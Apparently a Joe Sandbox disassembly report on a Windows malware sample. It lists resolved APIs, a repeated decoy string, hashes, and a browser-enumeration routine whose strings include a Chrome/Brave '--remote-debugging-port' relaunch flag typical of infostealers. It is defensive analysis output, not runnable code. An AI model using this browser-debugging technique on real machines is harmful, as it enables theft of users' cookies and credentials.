GetProcAddress.KERNEL32(70530000,02D3B658), ref: 0041A502
GetProcAddress.KERNEL32(70530000,02D44DE0), ref: 0041A51B
GetProcAddress.KERNEL32(768D0000,02D3B7F8), ref: 0041A53C
GetProcAddress.KERNEL32(768D0000,02D3B7B8), ref: 0041A554
GetProcAddress.KERNEL32(768D0000,02D44DF8), ref: 0041A56D
GetProcAddress.KERNEL32(768D0000,02D44E28), ref: 0041A585
GetProcAddress.KERNEL32(768D0000,02D3B598), ref: 0041A59D
GetProcAddress.KERNEL32(75790000,02D40630), ref: 0041A5C3
GetProcAddress.KERNEL32(75790000,02D40720), ref: 0041A5DB
GetProcAddress.KERNEL32(75790000,02D44E40), ref: 0041A5F3
GetProcAddress.KERNEL32(75790000,02D3B638), ref: 0041A60C
GetProcAddress.KERNEL32(75790000,02D3B818), ref: 0041A624
GetProcAddress.KERNEL32(75790000,02D40888), ref: 0041A63C
GetProcAddress.KERNEL32(75A10000,02D45068), ref: 0041A662
GetProcAddress.KERNEL32(75A10000,02D3B8F8), ref: 0041A67A
GetProcAddress.KERNEL32(75A10000,02D3DFC8), ref: 0041A692
GetProcAddress.KERNEL32(75A10000,02D45080), ref: 0041A6AB
GetProcAddress.KERNEL32(75A10000,02D44FC0), ref: 0041A6C3
GetProcAddress.KERNEL32(75A10000,02D3B578), ref: 0041A6DB
GetProcAddress.KERNEL32(75A10000,02D3B678), ref: 0041A6F4
GetProcAddress.KERNEL32(75A10000,02D45020), ref: 0041A70C
GetProcAddress.KERNEL32(75A10000,02D44FD8), ref: 0041A724
GetProcAddress.KERNEL32(76850000,02D3B858), ref: 0041A746
GetProcAddress.KERNEL32(76850000,02D44FF0), ref: 0041A75E
GetProcAddress.KERNEL32(76850000,02D45008), ref: 0041A776
GetProcAddress.KERNEL32(76850000,02D45038), ref: 0041A78F
GetProcAddress.KERNEL32(76850000,02D45050), ref: 0041A7A7
GetProcAddress.KERNEL32(75690000,02D3B918), ref: 0041A7C8
GetProcAddress.KERNEL32(75690000,02D3B878), ref: 0041A7E1
GetProcAddress.KERNEL32(769C0000,02D3B5D8), ref: 0041A802
GetProcAddress.KERNEL32(769C0000,02D45500), ref: 0041A81A
GetProcAddress.KERNEL32(6F8C0000,02D3B898), ref: 0041A840
GetProcAddress.KERNEL32(6F8C0000,02D3B5B8), ref: 0041A858
GetProcAddress.KERNEL32(6F8C0000,02D3B5F8), ref: 0041A870
GetProcAddress.KERNEL32(6F8C0000,02D453C8), ref: 0041A889
GetProcAddress.KERNEL32(6F8C0000,02D3B6B8), ref: 0041A8A1
GetProcAddress.KERNEL32(6F8C0000,02D3B838), ref: 0041A8B9
GetProcAddress.KERNEL32(6F8C0000,02D3B698), ref: 0041A8D2
GetProcAddress.KERNEL32(6F8C0000,02D3B618), ref: 0041A8EA
GetProcAddress.KERNEL32(6F8C0000,InternetSetOptionA), ref: 0041A901
GetProcAddress.KERNEL32(6F8C0000,HttpQueryInfoA), ref: 0041A917
GetProcAddress.KERNEL32(75D90000,02D454D0), ref: 0041A939
GetProcAddress.KERNEL32(75D90000,02D3DFE8), ref: 0041A951
GetProcAddress.KERNEL32(75D90000,02D45650), ref: 0041A969
GetProcAddress.KERNEL32(75D90000,02D45518), ref: 0041A982
GetProcAddress.KERNEL32(76470000,02D3B6D8), ref: 0041A9A3
GetProcAddress.KERNEL32(6EBA0000,02D453F8), ref: 0041A9C4
GetProcAddress.KERNEL32(6EBA0000,02D3B6F8), ref: 0041A9DD
GetProcAddress.KERNEL32(6EBA0000,02D45680), ref: 0041A9F5
GetProcAddress.KERNEL32(6EBA0000,02D455D8), ref: 0041AA0D

Strings

InternetSetOptionA, xrefs: 0041A8F5
HttpQueryInfoA, xrefs: 0041A90C

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: HttpQueryInfoA$InternetSetOptionA
API String ID: 2238633743-1775429166
Opcode ID: 20b608565022329c8e522603aeb206678cdaef6a3851366fd54475d7f707e8f0
Instruction ID: fc853244e6edf76f870e234c3061c456cb9d9aaab695e8dd72f65461d71d1d70
Opcode Fuzzy Hash: 20b608565022329c8e522603aeb206678cdaef6a3851366fd54475d7f707e8f0
Instruction Fuzzy Hash: 98623EB5D1B2549FC344DFA8FC8895677BBA78D301318A61BF909C3674E734A640CB62

Function 00404610 Relevance: 112.1, APIs: 34, Strings: 30, Instructions: 114
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 0040461C
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404627
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404632
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 0040463D
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404648
GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,00416C9B), ref: 00404657
RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,00416C9B), ref: 0040465E
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 0040466C
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404677
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404682
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 0040468D
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404698
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 004046AC
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 004046B7
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 004046C2
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 004046CD
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 004046D8
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404701
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040470C
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404717
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404722
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040472D
strlen.MSVCRT ref: 00404740
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404768
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404773
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040477E
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404789
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404794
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047A4
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047AF
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047BA
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047C5
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047D0
VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 004047EC

Strings

The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404779
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040462D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046FC
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404707
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404784
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404712
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047AA
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047C0
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046BD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046D3
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040467D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404617
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404667
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404693
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404643
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040479F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404688
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046B2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047CB
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040471D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404672
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404622
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040476E
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404638
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046C8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404728
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404763
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047B5
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046A7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040478F

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
API String ID: 2127927946-2218711628
Opcode ID: 17b32a439cbe3e0ae32343c02b1fa56e4c99a47b2d8951fd533b5c970d2f3f07
Instruction ID: 994efd3a0b10ceab7f5143b43c992d696de16e9dedea517f3aaaefbefb2e1973
Opcode Fuzzy Hash: 17b32a439cbe3e0ae32343c02b1fa56e4c99a47b2d8951fd533b5c970d2f3f07
Instruction Fuzzy Hash: F0413F79740624ABD7109FE5FC4DADCBF70AB4C702BA08061F90A99190C7F993859B7D

Function 0040BE40 Relevance: 63.7, APIs: 29, Strings: 7, Instructions: 727
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2F,00000000,?,?,?,00421450,00420B2E), ref: 0040BEC5
StrCmpCA.SHLWAPI(?,00421454), ref: 0040BF33
StrCmpCA.SHLWAPI(?,00421458), ref: 0040BF49
FindNextFileA.KERNEL32(000000FF,?), ref: 0040C8A9
FindClose.KERNEL32(000000FF), ref: 0040C8BB

Strings

\Brave\Preferences, xrefs: 0040C1C1
Google Chrome, xrefs: 0040C6F8
--remote-debugging-port=9229 --profile-directory=", xrefs: 0040C534
--remote-debugging-port=9229 --profile-directory=", xrefs: 0040C3B2
--remote-debugging-port=9229 --profile-directory=", xrefs: 0040C495
Brave, xrefs: 0040C0E8
Preferences, xrefs: 0040C104

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$Brave$Google Chrome$Preferences$\Brave\Preferences
API String ID: 3334442632-1869280968
Opcode ID: f2b45d195377af59fe982dc47c2184ec7de3bc5464beb7f4812a9663255b3df3
Instruction ID: 94c18d54b217f3a33de79012ae3cbc39d408ee074d55138b38aa149d1ce8c153
Opcode Fuzzy Hash: f2b45d195377af59fe982dc47c2184ec7de3bc5464beb7f4812a9663255b3df3
Instruction Fuzzy Hash: 5C52A871A011049BCB14FB61DC96EEE733DAF54304F4045AEF50A66091EF386B98CFAA

Function 00414B60 Relevance: 38.7, APIs: 18, Strings: 4, Instructions: 172
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00414B7C
FindFirstFileA.KERNEL32(?,?), ref: 00414B93
StrCmpCA.SHLWAPI(?,00420FC4), ref: 00414BC1
StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414BD7
FindNextFileA.KERNEL32(000000FF,?), ref: 00414DCD
FindClose.KERNEL32(000000FF), ref: 00414DE2

Strings

%s\%s, xrefs: 00414BF4
%s\*, xrefs: 00414B70
%s\%s, xrefs: 00414C4B
-SA, xrefs: 00414DE8, 00414DAB, 00414D54, 00414BA8, 00414D57, 00414DAE

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$%s\%s$%s\*$-SA
API String ID: 180737720-309722913
Opcode ID: 541d2619070d49fc00c86c3e090d7385f4095ffb7cd62adbf069259adc4bb43c
Instruction ID: 6eceda3e2f2aeeb228f448c6629b31eb3c314648a2220d8d34325ba683034fba
Opcode Fuzzy Hash: 541d2619070d49fc00c86c3e090d7385f4095ffb7cd62adbf069259adc4bb43c
Instruction Fuzzy Hash: F2617771904218ABCB20EBA0ED45FEA737DBF48701F40458EF60996191FB74AB84CF95

Function 6CE435A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(6CECF688,00001000), ref: 6CE435D5
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6CE435E0
QueryPerformanceFrequency.KERNEL32(?), ref: 6CE435FD
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6CE4363F
GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6CE4369F
__aulldiv.LIBCMT ref: 6CE436E4
QueryPerformanceCounter.KERNEL32(?), ref: 6CE43773
EnterCriticalSection.KERNEL32(6CECF688), ref: 6CE4377E
LeaveCriticalSection.KERNEL32(6CECF688), ref: 6CE437BD
QueryPerformanceCounter.KERNEL32(?), ref: 6CE437C4
EnterCriticalSection.KERNEL32(6CECF688), ref: 6CE437CB
LeaveCriticalSection.KERNEL32(6CECF688), ref: 6CE43801
__aulldiv.LIBCMT ref: 6CE43883
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6CE43902
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6CE43918
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6CE4394C

Strings

